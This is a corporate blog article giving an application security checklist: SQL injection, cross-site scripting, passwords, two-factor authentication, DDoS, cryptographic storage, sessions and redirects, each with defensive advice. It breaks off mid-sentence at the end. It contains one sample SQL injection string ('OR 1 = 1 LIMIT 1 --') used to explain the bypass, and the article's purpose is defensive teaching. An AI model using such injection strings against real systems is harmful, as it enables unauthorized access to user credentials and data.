XenonStack Recommends

Continuous Security

Application Security Checklist and Strategy for 2023

Parveen Bhandari | 15 March 2023

Application Security Checklist and Strategy

Introduction to Application Security

Application security describes the security measures at the application level that secures the data or the code from being stolen. Most of this happens at the time of application development and design after the application is deployed; it also involves multiple systems and approaches to secure applications. Application-level security may incorporate hardware, software and procedures that recognize or reduce the vulnerabilities.

A way of protecting the websites and web application from being hacked or any unauthorized access, done by creating an extra layer of a protection measure and protocol. Click to explore about, Website Security Benefits

Now organizations are aware of Application security. Many tools are currently present to safeguard the application from coding threats, evaluates encryption options, manage access rights and application auditing permission. The quicker you can find the issues, that is while designing or development, the sooner you can fix the security issues and safer you are. It is natural to make mistakes but to identify the issues promptly is the biggest challenge.

Every organization scans its infrastructure, applications, and even culture for vulnerabilities, which can be found in areas such as configuration, code syntax, or frontline awareness and training. Taken From, The risk-based approach to cybersecurity - Mckinsey

What is Application Vulnerability?

An application vulnerability is a defect that could be misused to jeopardize the security of the application. These violations target the integrity, confidentiality, of resources occupied by an application, its users. This article will list all the points you should take care of securing your applications and we can't stress enough on how important that is.  Let us get started with Application Security Vulnerabilities Checklist.

Application Security Checklist

Application Security Vulnerability

SQL Injection

  • An SQL injection is a technique, uses malicious SQL code for backed database manipulation, or may also destroy the database.
  • It is a vulnerability that may affect the web application or the website which uses an SQL database such as SQL Server, Oracle, MySQL, etc.
  • Attackers use the SQL injection for finding the credentials of the other users in the database.
  • Using SQL injection, one can alter the data in the database, i.e. you can delete, update, or insert the data.
Example -
  • You have created a table 'users' using create table command.
  • The table users have the following fields: id, email, password
  • Now, we usually use select * from users to retrieve the data, and this command will give all rows and columns in the table users.
  • Now, run the following command: select*from users where email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('1234');
  • OR 1 = 1 LIMIT 1 is a condition that will always be true.
  • -- ' AND is a SQL comment that eliminates the password part.
  • The highlighted text means it is a comment.

Prevent SQL injection

  • use prepared statements, parameterized queries
  • do not reveal the sensitive information in the error messages
  • use web applications firewall

Secure Your Password

  • Choose password manager without master recovery - Choose a password manager, that should not allow for the improvement of a master password. If an attacker can get a grip on the master password through the account recovery tools, then this makes the most secure password management programs useless.
  • Use two-factor authentication - Use two-factor authentication to protect password manager.
  • 2FA is a login process that requires users to prove that they are who they claim to be.
  • Turn-off auto fill
  • Use strong passwords
  • Use unique passwords
The strength of Artificial Intelligence in cyber security with the skills of security professionals from vulnerability checks to defense becomes very effective. Click to explore about, Artificial Intelligence in Cyber Security

Cross-Site Scripting (XSS) in Application Security Vulnerability

  • Type of a computer security vulnerability, found in web application.
  • It is a common attack vector that injects the malicious code into vulnerable web applications.
  • Allows an attacker to execute the malicious javascript(JS) in the user's browser.
  • The actual attack occurs when the victim visits the web application or web page, that executes the malicious code.
  • Types of XSS - Persistent XSS, Reflected XSS, DOM-based XSS.

Persistent XSS

  • One of the website's forms is used by the attacker to insert a malicious string into the website's database.
  • The victim requests page from the site
  • The website includes the malicious string from the database in the response and sends it to the victim.
  • The targeted user's browser executes the malicious scripts inside the response and sends the targeted user's cookies to the attacker's server.

Reflected XSS

  • The attacker crafts a URL containing a malicious string and sends it to the victim.
  • The attacker tricks the victim into requesting the URL from the website.
  • The malicious string is included in the website from the URL in the response.
  • The targeted user's browser executes the malicious script inside the response and sends the cookies of the targeted user to the attacker's server.
The process of creating, integrating, and testing security measures into applications to protect them from security vulnerabilities like unauthorized access. Click to explore about, Guide to Application Security

Two-Factor Authentication in Application Security Vulnerability

  • Provides an additional layer of security against unauthorized access to the account
  • This method requires the entering of more than one piece of information to the successful login of the account.
  • Except for username and passwords, 2FA requires the user to enter the additional information such as OTP, i.e. a six-digit verification code.
  • This verification code is the tokens that can be generated by the google authentication app.
  • No internet is required for the generation of these tokens.
  • The tokens are updated after every 30 seconds.

Distributed denial of service (DDoS)

  • It is a cyber attack on a specific server or network
  • DDoS is an attack from multiple sources
  • By using malicious software, the attacker gets other networks to get involved in a DDoS attack.
  • It is an attack meant to shut down a machine or system, making it inaccessible to its users.
  • Botnet - A botnet is an army of infected computers to make DDoS attack.
  • The attacker developed the malware program and distributed over the internet, i.e. put it on the websites and email attachments.
  • If a computer can go through these websites or open these attachments, the malware will be installed on their computer without the owner knowing that their computer is affected.
  • Therefore, the computer is ready to form a DDoS attack.
Running penetration tests on software early in the development process is one way to thwart holes that enable L7 DDoS attacks. Taken from Article, DevSecOps Tools and Continuous Security

Insecure Cryptographic Storage in Application Security Vulnerability

  • Is a vulnerability that occurs when the sensitive data is not securely secured, i.e. appropriately encrypted.
  • Raw data can be considered as username, passwords, credit card information, etc.
  • Reasons for insecure storage are crucial improper storage and management, using bad algorithms, incorrect encryption of data, etc.
  • This unsafe storage can lead to loss of the delegate information
Preventing Insecure Cryptographic Storage
  • Use standard methods for the encryption
  • Do not create the encryption algorithms by yourself
  • Use known secure encryption algorithms
  • Ensure that the data stored is not easy to decrypt
  • If using crucial asymmetric encryption, be sure to store private keys securely and carefully.

Broken Authentication and Session Management

The websites create a session cookie and session ID typically for each valid session, and these cookies contain sensitive data like username, password, etc. Whenever the session is ended either by browser closed abruptly, or log out these cookies should be invalidated, i.e. there should be a new cookie for each session. If these cookies are not overridden, the sensitive data will exist in the system which can be more vulnerable. Therefore, a check should be done to find the strength of authentication and session management. Keys, session tokens, cookies should be adequately implemented without compromising the passwords.

Consider Relevant Tools for Application Security Vulnerabilities

Choosing the right tool will help us to find the vulnerabilities. The device you should choose will able to meet the objectives of the project. So, whether paid or freely available, the machine should be relevant to the security testing needs. The tools used are for detecting the loopholes, i.e. they will ease the process; they will not help to meet all your objectives.

Recheck the vulnerabilities reported

Results are out after the security testing. Therefore, it is essential to validate the findings and cross-check whether they exist or not. With this way, the reporting flaws are authenticated against the required context. This will save time and efforts in the long run and install the much-needed confidence in the testing process.

Invalidated Redirects and Forwards

The web application uses some methods to forward and redirects to other pages. So there should be an adequately validated method used for forwarding and redirecting to other pages. If there is no proper validation method used while redirecting to the other pages, attackers can make use of this and can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
Security measure is as much significant concern as the development of the end product is. Click to explore about, DevSecOps Security Checklist

An Approach to Application Security

Continuous Security monitoring approach supports Enterprises to enable real-time insights for their security presence and help them for continually observing cyber attacks. To facilitate this approach we advise taking the subsequent steps -